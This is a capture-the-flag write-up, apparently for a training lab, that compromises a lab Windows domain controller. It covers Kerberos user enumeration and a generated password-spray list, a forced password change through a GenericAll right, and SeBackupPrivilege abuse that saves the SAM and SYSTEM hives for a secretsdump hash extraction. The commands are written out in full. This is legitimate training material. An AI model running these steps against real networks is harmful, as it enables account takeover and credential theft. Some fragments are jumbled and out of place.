Welcome to Middle Camp, where we continue from part one. Using credentials found at Base Camp, we established a foothold in this new area. From here, we brute-forced the password of another user, gaining more access. This allowed us to change the password of a member in the Backup Operators group, giving us the right permissions to proceed. We then dumped registry files to collect password hashes. Finally, using these hashes, we escalated our privileges and successfully obtained a shell as Administrator.
Nmap
As always, we start off with an NMAP scan:
plaintext
nmap 10.10.173.62 -sC -sV -vv -Pn -oN k2.win.thm.nmap PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack Simple DNS Plus 88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-10-25 05:45:03Z) 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack 464/tcp open kpasswd5? syn-ack 593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack 3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack 3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: K2 | NetBIOS_Domain_Name: K2 | NetBIOS_Computer_Name: K2SERVER | DNS_Domain_Name: k2.thm | DNS_Computer_Name: K2Server.k2.thm | DNS_Tree_Name: k2.thm | Product_Version: 10.0.17763 |_ System_Time: 2024-10-25T05:45:14+00:00 | ssl-cert: Subject: commonName=K2Server.k2.thm | Issuer: commonName=K2Server.k2.thm | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-10-24T05:42:41 | Not valid after: 2025-04-25T05:42:41 | MD5: 47f7:dd59:133f:4091:dc3e:5207:06c6:b6aa | SHA-1: 43ce:0aec:eb22:fccb:da6d:887a:5090:7be5:021d:00ab | -----BEGIN CERTIFICATE----- | MIIC4jCCAcqgAwIBAgIQUOZHDI70Qa5EcfFXKNY9rTANBgkqhkiG9w0BAQsFADAa | MRgwFgYDVQQDEw9LMlNlcnZlci5rMi50aG0wHhcNMjQxMDI0MDU0MjQxWhcNMjUw | NDI1MDU0MjQxWjAaMRgwFgYDVQQDEw9LMlNlcnZlci5rMi50aG0wggEiMA0GCSqG | SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDQ7b3P4KSx2CYlAArB5P6BE/rwq2MIrKfs | RijfxyxrTuLRqmY3krWWUgaKGactgd6GPkxtkIS/y33KmN4vPbgNVIN7SgFFatrJ | jRmfqLgg4nosDqL2uEnO6Kdr+Z8a1sb41CGvhqGucX6PVLFXlxkCJ0lFJTcR4Mj6 | cSgGji2KxHi9gwnw0J/0YsIQsak29jNyJcGeD3dPbN+HZKTO6v5vuM1zPWbAzFYd | CDPVoikFCDuyMD98b2uo9SoMOUYXbHtDPx+y4QGqU8yXM5QAPDrLqWQXvBhrSlhK | 0C+vMVKHXe+trXP4xa/Lb2MVkJvmsaQgyvGCIVX0UgFio3L67sMpAgMBAAGjJDAi | MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF | AAOCAQEAxg1C/DjmL/ZZWkM4+tWaoIlBzEjC3xS8G1dHRjBpBYT+tcyjJZd8mLJr | fBJH8CwIpkbNnsYafFzjZB6jgqam1trMD0UeqLySHlfLmA+BdRqfLaycibB6fMVQ | FmO84ojLvTS88LQlHiLcSw6KnY2XJCAlkAbGJ02cKvIIfCVJRxXkzbENXF0sV2Mb | 0U0maJbE9fe3Ta1QRL5pQ9EBGzPoesCFL7uEHa3r4X8QVhgrRrm4Si76Roduxom2 | jWGbcSmy6T2uyOIlQLpQaNHT48AuRqstCZiQbmtlLYxYhWKt/YSw3vaethU39igQ | 2kFUoFIV5eduiaSzWkRtqJ0b/tvxvA== |_-----END CERTIFICATE----- |_ssl-date: 2024-10-25T05:45:53+00:00; 0s from scanner time. Service Info: Host: K2SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
From the open ports, we can assume that we are dealing with a Domain Controller!
From Nmap scan we obtains the hostname ‘K2SERVER’ and the domain name ‘k2.thm’.
Getting a foothold
The task requires us to utilize all the information we gathered earlier. Therefore, let’s create a list of potential usernames using the full names obtained from the previous task using username-anarchy. From this, we have derived the usernames Rose Bud and James Bold.
And we got 2 valid usernames
How this Works A TGT request is made through an AS-REQ message. When an invalid username is requested, the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN in the AS-REP message. When working with a valid username, either a TGT will be obtained, or an error like KRB5KDC_ERR_PREAUTH_REQUIRED will be raised (i.e. in this case, indicating that the user is required to perform preauthentication).
Now that we know the valid username , we can test the passwords found from Base Camp using netexec.
I test all the passwords that we Found from the Base Camp against j.bold.
Your password "rockyou" was found to only contain alphabetical characters. I have removed your Remote Access for now.
At the very least adhere to the new password policy: 1. Length of password must be in between 6-12 characters 2. Must include at least 1 special character 3. Must include at least 1 number between the range of 0-999
bash
*Evil-WinRM* PS C:\Users\r.bud\Documents> cat notes.txt Done: 1. Note was sent and James has already performed the required action. They have informed me that they kept the base password the same, they just added two more characters to meet the criteria. It is easier for James to remember it that way.
2. James's password meets the criteria. Pending: 1. Give James Remote Access.
From these notes, we learn that James’s password has “rockyou” and two more characters.
I asked chatgpt to create a python script to add two random characters to “rockyou” ( 1 special character and 1 number between the range of 0-9). By running the script, we can get all possible passwords.
python
import string
defgenerate_passwords(): # Define the fixed word, numbers, and special characters base_word = "rockyou" special_characters = "!@#$%^&*()-_=+[]{}|;:,.<>?/~`" numbers = string.digits
passwords = []
# Generate passwords by appending or prepending a digit and special character for number in numbers: for special_char in special_characters: # Two possible formats: prepend or append passwords.append(f"{number}{special_char}{base_word}") passwords.append(f"{special_char}{number}{base_word}") passwords.append(f"{base_word}{number}{special_char}") passwords.append(f"{base_word}{special_char}{number}")
return passwords
# Generate and print all possible passwords all_passwords = generate_passwords() for password in all_passwords: print(password)
(02:26:35) [*] DNSChef started on interface: 127.0.0.1 (02:26:35) [*] Using the following nameservers: 8.8.8.8 (02:26:35) [*] Cooking all A replies to point to 10.10.202.68
I always like to mark every users that I can access as Onwned.
Checking bloodhound data, we can see the j.bold has GenericAll to over j.smith.
To get infotmation about how to exploit this right-click on the edge between IT STAFF group and j.smith
We can exploit this using multible ways. I choose Force Change Password.
Let’s change the password of ‘j.smith’.
bash
net rpc password "j.smith""Password123@" -U "k2.thm"/"j.bold"%"[REDACTED]" -S K2Server.k2.thm
Now we can get a shell using evil-winrm and read user.txt in C:\Users\j.smith\Desktop\user.txt.
SeBackupPrivilege
After enumurating j.smith privileges. We find that he has SeBackupPrivilege privilege enabled. This privilege allows the user to read all the files in the system.
User Name SID ========== ============================================ k2\j.smith S-1-5-21-1966530601-3185510712-10604624-1115
GROUP INFORMATION -----------------
Group Name Type SID Attributes ========================================== ================ ============================================ =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group K2\IT Staff 1 Alias S-1-5-21-1966530601-3185510712-10604624-1116 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION -----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Accourding to this article, We can dump all the NTLM hashes from SAM database.
First we create a Temp directory in C:/ file then use SeBackupPrivilege to read the SAM file and save a variant of it. Similarly, we read the SYSTEM file and save a variant of it.
powershell
cd c:\ mkdir Temp reg save hklm\sam c:\Temp\sam reg save hklm\system c:\Temp\system
download the SAM and system files from C:\Temp
powershell
cd Temp download sam download system
We can dump administrator hash local.
bash
impacket-secretsdump -sam sam -system system local Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:9[REDACTED]32f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Cleaning up...
